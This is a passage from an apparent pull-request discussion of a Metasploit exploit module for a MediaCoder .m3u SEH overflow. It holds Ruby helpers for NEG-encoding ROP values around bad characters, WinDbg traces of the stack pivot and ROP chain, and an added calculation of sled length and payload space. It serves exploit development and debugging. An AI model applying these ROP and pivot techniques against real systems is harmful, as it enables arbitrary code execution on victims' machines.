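# Encodes values for a "POP EAX # ... # NEG EAX" ROP sequence so that the
# dword written into the chain contains no bad characters.

# 32-bit two's-complement negation: what NEG EAX does to the register.
def neg32(v)
  (-v) & 0xffffffff
end

# Encode wanted so that the dword placed on the stack contains none of
# badchars and NEGs back to a value >= wanted. Returns [encoded_dword, value].
# For a VirtualProtect/VirtualAlloc size, protecting a few bytes more than
# the payload needs is harmless, so the size is bumped until it is clean.
def neg_encode(wanted, badchars = "\x00")
  bad = badchars.bytes
  value = wanted
  loop do
    enc = neg32(value)
    clean = ([enc].pack('V').bytes & bad).empty?
    return [enc, value] if clean
    value += 1
  end
end

# Packs the encoded dword for the chain and verifies the gadget recovers the
# effective value, so a packing mistake fails here rather than on the target.
def neg_dword(wanted, badchars = "\x00")
  enc, effective = neg_encode(wanted, badchars)
  raise "NEG round trip failed for #{wanted}" unless neg32(enc) == effective
  [enc].pack('V')
end

# Final check a module should run over the whole buffer, not only the size.
def contains_badchars?(buf, badchars)
  !(buf.bytes & badchars.bytes).empty?
end
```

With only "\x00" as a bad character the helper behaves like get_neg_value above; passing "\x00\x0a\x0d" (a constructed set for a line-oriented format like .m3u) shows why the bump may need more than one step and why the effective size, not the requested one, must be what the chain hands to the API.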

@modpr0be
Contributor Author

Doesn't work with @wchen-r7's changes, using windows/exec:

(1ce8.ff4): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000000 ecx=00000000 edx=7707f17d esi=00000000 edi=00000000
eip=7701410c esp=01d3ff5c ebp=01d3ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
7701410c cc              int     3
0:027> g
(1ce8.1af4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008c ebx=7714ad60 ecx=04bf8b20 edx=fb5374e0 esi=005308c8 edi=000707be
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
0:000> !exchain
0012f3f4: postproc_52+14435 (6afd4435)
Invalid exception stack at 6afc1446
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll - 
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f464  6ab16202           <-- landed at ROP NOP address
0:000> dd /c1 esp+0x7cc    <-- but need 0x7cc to get first gadget
0012fc30  6ab16202            
0012fc34  100482ff             <-- first rop gadget in rop_gadgets
0012fc38  ffffffc0
0012fc3c  4655546e
0012fc40  66d9d9ba
0012fc44  6ab2241d
0012fc48  71757656
0012fc4c  71757656
0012fc50  71757656
0012fc54  71757656
0012fc58  71757656
0012fc5c  71757656
0012fc60  71757656
0012fc64  71757656
0012fc68  71757656
0012fc6c  71757656
0012fc70  71757656
0012fc74  71757656
0012fc78  71757656
0012fc7c  71757656
0012fc80  71757656
0012fc84  1004a8ee
0012fc88  6ab561b0
0012fc8c  66d9feee
0012fc90  6ab19780
0012fc94  66d929f5
0012fc98  ffffff1b
0012fc9c  444f6850
0012fca0  6ab3c65a
0012fca4  1004cc03
0012fca8  ffffffff
0012fcac  660166e9

Tested in both physical and VM (VirtualBox) environments; both gave me the same result: calc.exe never shows up.
I think there is no space left for the shellcode itself; the end of the shellcode is cut off. I used windows/exec, which uses less space than bind/reverse shell or meterpreter shellcode.

If you guys already tested it and it worked on Windows 7 SP0, then I should probably remove SP1 and change it to SP0.
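
The landing-zone question that runs through wchen-r7's and modpr0be's traces above (where the pivot's RETN lands in rop_gadgets, how long the ROP NOP sled has to be, and why 35+491 NOPs leave no room for the payload) can be reasoned about rather than guessed. The following is an added example, not code from the module or the PR; every address in it is taken from the WinDbg output in this thread, while the Offset and Max values passed to payload_room are hypothetical because the page does not show the module's target table.

```ruby
# Added example, not code from the MediaCoder module or this PR.
# Models the SEH stack pivot used here:
#   ADD ESP,7ACh # POP EBX # POP ESI # POP EDI # POP EBP # RETN
# and the file layout from the posted exploit():
#   "http://A" + Offset bytes of RETN 0x0C + target.ret + rop_gadgets + 16 NOPs + payload

DWORD = 4

# Address of the dword the pivot's RETN consumes, i.e. where execution lands.
# esp_at_gadget is ESP when the handler gadget is entered (0012eca8 above).
def pivot_landing(esp_at_gadget, add_esp, pops)
  esp_at_gadget + add_esp + pops * DWORD
end

# rop_gadgets starts right after the SEH record: nSEH at seh_record, the
# handler (target.ret, the pivot) at seh_record+4, first chain dword at +8.
def rop_start(seh_record)
  seh_record + 2 * DWORD
end

# Index (in dwords) into rop_gadgets where the RETN lands.
def landing_index(seh_record, landing)
  (landing - rop_start(seh_record)) / DWORD
end

# Address of the first real gadget when the chain begins with `sled` ROP NOPs.
def first_gadget(seh_record, sled)
  rop_start(seh_record) + sled * DWORD
end

# The landing dword must be one of the ROP NOPs; landing before the chain or
# past the sled means RETN picks up junk or a mid-chain gadget and the chain breaks.
def sled_covers?(sled, idx)
  idx >= 0 && idx < sled
end

# Smallest sled covering every landing index observed across test boxes,
# plus a few spare dwords for boxes that were not measured.
def sled_for(observed_indices, spare = 8)
  observed_indices.max + 1 + spare
end

# Dwords in the posted chain after the sled: gadgets, junk(15), arguments, NOPs.
CHAIN_TAIL_DWORDS = 41

# Bytes left for the payload if `max` is the total number of bytes the module
# writes (hypothetical meaning of target['Max']; the page does not define it).
# Negative means the payload does not fit, which is what the SP1 trace shows.
def payload_room(max, offset, sled, nop_bytes = 16)
  max - 'http://A'.length - offset - DWORD - (sled + CHAIN_TAIL_DWORDS) * DWORD - nop_bytes
end
```

Plugging in the traced values: ESP 0012eca8 at the gadget lands at 0012f464, which is dword 26 of rop_gadgets (SEH record at 0012f3f4). With the original 35 NOPs the first gadget sits at 0012f488, and with 35+491 it sits at 0012fc34, exactly the two addresses where 100482ff appears in the dumps above; the extra 491 dwords buy nothing on a box that lands at index 26 and cost 1964 bytes of payload space.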

@wchen-r7
Contributor

Yeah, that'd be great. Thanks.

wchen-r7 added a commit that referenced this pull request Jul 12, 2013
@wchen-r7
Contributor

Merged, thanks.

@wchen-r7 wchen-r7 merged commit 16c9eff into rapid7:master Jul 12, 2013
@modpr0be modpr0be deleted the module-mediacoder-m3u branch April 3, 2015 14:56